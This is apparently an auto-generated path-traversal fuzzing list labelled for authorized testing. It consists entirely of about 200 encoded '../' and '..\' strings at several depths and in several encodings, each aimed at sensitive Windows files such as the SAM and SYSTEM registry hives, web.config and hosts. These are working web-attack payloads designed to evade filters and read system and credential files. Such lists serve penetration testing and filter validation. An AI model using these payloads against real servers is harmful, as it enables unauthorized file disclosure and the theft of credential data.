# Auto-generated payloads for authorized testing only

%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cWindows%255cSystem32%255cconfig%255cSAM
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cWindows%255cwin.ini
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cWindows%5cSystem32%5cconfig%5cSAM
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cWindows%5cwin.ini
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\Users\Public\Documents\desktop.ini
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\Windows\System32\config\SAM
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\Windows\System32\config\SYSTEM
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\Windows\System32\drivers\etc\hosts
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\Windows\win.ini
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\inetpub\wwwroot\web.config
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cWindows%255cSystem32%255cconfig%255cSAM
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cWindows%255cwin.ini
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cWindows%5cSystem32%5cconfig%5cSAM
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cWindows%5cwin.ini
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\Users\Public\Documents\desktop.ini
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\Windows\System32\config\SAM
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\Windows\System32\config\SYSTEM
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\Windows\System32\drivers\etc\hosts
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\Windows\win.ini
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fC:\inetpub\wwwroot\web.config
%2e%2e%252f%2e%2e%252fC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
%2e%2e%252f%2e%2e%252fC:%255cWindows%255cSystem32%255cconfig%255cSAM
%2e%2e%252f%2e%2e%252fC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
%2e%2e%252f%2e%2e%252fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%252f%2e%2e%252fC:%255cWindows%255cwin.ini
%2e%2e%252f%2e%2e%252fC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%252f%2e%2e%252fC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
%2e%2e%252f%2e%2e%252fC:%5cWindows%5cSystem32%5cconfig%5cSAM
%2e%2e%252f%2e%2e%252fC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
%2e%2e%252f%2e%2e%252fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%252f%2e%2e%252fC:%5cWindows%5cwin.ini
%2e%2e%252f%2e%2e%252fC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%252f%2e%2e%252fC:\Users\Public\Documents\desktop.ini
%2e%2e%252f%2e%2e%252fC:\Windows\System32\config\SAM
%2e%2e%252f%2e%2e%252fC:\Windows\System32\config\SYSTEM
%2e%2e%252f%2e%2e%252fC:\Windows\System32\drivers\etc\hosts
%2e%2e%252f%2e%2e%252fC:\Windows\win.ini
%2e%2e%252f%2e%2e%252fC:\inetpub\wwwroot\web.config
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cWindows%255cSystem32%255cconfig%255cSAM
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cWindows%255cwin.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cWindows%5cSystem32%5cconfig%5cSAM
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cWindows%5cwin.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\Users\Public\Documents\desktop.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\Windows\System32\config\SAM
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\Windows\System32\config\SYSTEM
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\Windows\System32\drivers\etc\hosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\Windows\win.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\inetpub\wwwroot\web.config
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cWindows%255cSystem32%255cconfig%255cSAM
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cWindows%255cwin.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cWindows%5cSystem32%5cconfig%5cSAM
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cWindows%5cwin.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\Users\Public\Documents\desktop.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\Windows\System32\config\SAM
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\Windows\System32\config\SYSTEM
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\Windows\System32\drivers\etc\hosts
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\Windows\win.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fC:\inetpub\wwwroot\web.config
%2e%2e%2f%2e%2e%2fC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
%2e%2e%2f%2e%2e%2fC:%255cWindows%255cSystem32%255cconfig%255cSAM
%2e%2e%2f%2e%2e%2fC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
%2e%2e%2f%2e%2e%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%2f%2e%2e%2fC:%255cWindows%255cwin.ini
%2e%2e%2f%2e%2e%2fC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%2f%2e%2e%2fC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
%2e%2e%2f%2e%2e%2fC:%5cWindows%5cSystem32%5cconfig%5cSAM
%2e%2e%2f%2e%2e%2fC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
%2e%2e%2f%2e%2e%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%2f%2e%2e%2fC:%5cWindows%5cwin.ini
%2e%2e%2f%2e%2e%2fC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%2f%2e%2e%2fC:\Users\Public\Documents\desktop.ini
%2e%2e%2f%2e%2e%2fC:\Windows\System32\config\SAM
%2e%2e%2f%2e%2e%2fC:\Windows\System32\config\SYSTEM
%2e%2e%2f%2e%2e%2fC:\Windows\System32\drivers\etc\hosts
%2e%2e%2f%2e%2e%2fC:\Windows\win.ini
%2e%2e%2f%2e%2e%2fC:\inetpub\wwwroot\web.config
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cWindows%255cSystem32%255cconfig%255cSAM
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cWindows%255cwin.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cWindows%5cSystem32%5cconfig%5cSAM
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cWindows%5cwin.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\Users\Public\Documents\desktop.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\Windows\System32\config\SAM
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\Windows\System32\config\SYSTEM
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\Windows\System32\drivers\etc\hosts
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\Windows\win.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\inetpub\wwwroot\web.config
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cWindows%255cSystem32%255cconfig%255cSAM
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cWindows%255cwin.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cWindows%5cSystem32%5cconfig%5cSAM
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cWindows%5cwin.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\Users\Public\Documents\desktop.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\Windows\System32\config\SAM
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\Windows\System32\config\SYSTEM
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\Windows\System32\drivers\etc\hosts
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\Windows\win.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cC:\inetpub\wwwroot\web.config
%2e%2e%5c%2e%2e%5cC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
%2e%2e%5c%2e%2e%5cC:%255cWindows%255cSystem32%255cconfig%255cSAM
%2e%2e%5c%2e%2e%5cC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
%2e%2e%5c%2e%2e%5cC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%2e%2e%5c%2e%2e%5cC:%255cWindows%255cwin.ini
%2e%2e%5c%2e%2e%5cC:%255cinetpub%255cwwwroot%255cweb.config
%2e%2e%5c%2e%2e%5cC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
%2e%2e%5c%2e%2e%5cC:%5cWindows%5cSystem32%5cconfig%5cSAM
%2e%2e%5c%2e%2e%5cC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
%2e%2e%5c%2e%2e%5cC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%2e%2e%5c%2e%2e%5cC:%5cWindows%5cwin.ini
%2e%2e%5c%2e%2e%5cC:%5cinetpub%5cwwwroot%5cweb.config
%2e%2e%5c%2e%2e%5cC:\Users\Public\Documents\desktop.ini
%2e%2e%5c%2e%2e%5cC:\Windows\System32\config\SAM
%2e%2e%5c%2e%2e%5cC:\Windows\System32\config\SYSTEM
%2e%2e%5c%2e%2e%5cC:\Windows\System32\drivers\etc\hosts
%2e%2e%5c%2e%2e%5cC:\Windows\win.ini
%2e%2e%5c%2e%2e%5cC:\inetpub\wwwroot\web.config
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%255cWindows%255cSystem32%255cconfig%255cSAM
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%255cWindows%255cwin.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%255cinetpub%255cwwwroot%255cweb.config
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%5cWindows%5cSystem32%5cconfig%5cSAM
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%5cWindows%5cwin.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%5cinetpub%5cwwwroot%5cweb.config
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:\Users\Public\Documents\desktop.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:\Windows\System32\config\SAM
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:\Windows\System32\config\SYSTEM
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:\Windows\System32\drivers\etc\hosts
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:\Windows\win.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:\inetpub\wwwroot\web.config
..%2f..%2f..%2f..%2f..%2fC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
..%2f..%2f..%2f..%2f..%2fC:%255cWindows%255cSystem32%255cconfig%255cSAM
..%2f..%2f..%2f..%2f..%2fC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
..%2f..%2f..%2f..%2f..%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..%2f..%2f..%2f..%2f..%2fC:%255cWindows%255cwin.ini
..%2f..%2f..%2f..%2f..%2fC:%255cinetpub%255cwwwroot%255cweb.config
..%2f..%2f..%2f..%2f..%2fC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
..%2f..%2f..%2f..%2f..%2fC:%5cWindows%5cSystem32%5cconfig%5cSAM
..%2f..%2f..%2f..%2f..%2fC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
..%2f..%2f..%2f..%2f..%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..%2f..%2f..%2f..%2f..%2fC:%5cWindows%5cwin.ini
..%2f..%2f..%2f..%2f..%2fC:%5cinetpub%5cwwwroot%5cweb.config
..%2f..%2f..%2f..%2f..%2fC:\Users\Public\Documents\desktop.ini
..%2f..%2f..%2f..%2f..%2fC:\Windows\System32\config\SAM
..%2f..%2f..%2f..%2f..%2fC:\Windows\System32\config\SYSTEM
..%2f..%2f..%2f..%2f..%2fC:\Windows\System32\drivers\etc\hosts
..%2f..%2f..%2f..%2f..%2fC:\Windows\win.ini
..%2f..%2f..%2f..%2f..%2fC:\inetpub\wwwroot\web.config
..%2f..%2fC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
..%2f..%2fC:%255cWindows%255cSystem32%255cconfig%255cSAM
..%2f..%2fC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
..%2f..%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..%2f..%2fC:%255cWindows%255cwin.ini
..%2f..%2fC:%255cinetpub%255cwwwroot%255cweb.config
..%2f..%2fC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
..%2f..%2fC:%5cWindows%5cSystem32%5cconfig%5cSAM
..%2f..%2fC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
..%2f..%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..%2f..%2fC:%5cWindows%5cwin.ini
..%2f..%2fC:%5cinetpub%5cwwwroot%5cweb.config
..%2f..%2fC:\Users\Public\Documents\desktop.ini
..%2f..%2fC:\Windows\System32\config\SAM
..%2f..%2fC:\Windows\System32\config\SYSTEM
..%2f..%2fC:\Windows\System32\drivers\etc\hosts
..%2f..%2fC:\Windows\win.ini
..%2f..%2fC:\inetpub\wwwroot\web.config
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%255cWindows%255cSystem32%255cconfig%255cSAM
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%255cWindows%255cwin.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%255cinetpub%255cwwwroot%255cweb.config
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%5cWindows%5cSystem32%5cconfig%5cSAM
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%5cWindows%5cwin.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:%5cinetpub%5cwwwroot%5cweb.config
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:\Users\Public\Documents\desktop.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:\Windows\System32\config\SAM
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:\Windows\System32\config\SYSTEM
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:\Windows\System32\drivers\etc\hosts
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:\Windows\win.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cC:\inetpub\wwwroot\web.config
..%5c..%5c..%5c..%5c..%5cC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
..%5c..%5c..%5c..%5c..%5cC:%255cWindows%255cSystem32%255cconfig%255cSAM
..%5c..%5c..%5c..%5c..%5cC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
..%5c..%5c..%5c..%5c..%5cC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..%5c..%5c..%5c..%5c..%5cC:%255cWindows%255cwin.ini
..%5c..%5c..%5c..%5c..%5cC:%255cinetpub%255cwwwroot%255cweb.config
..%5c..%5c..%5c..%5c..%5cC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
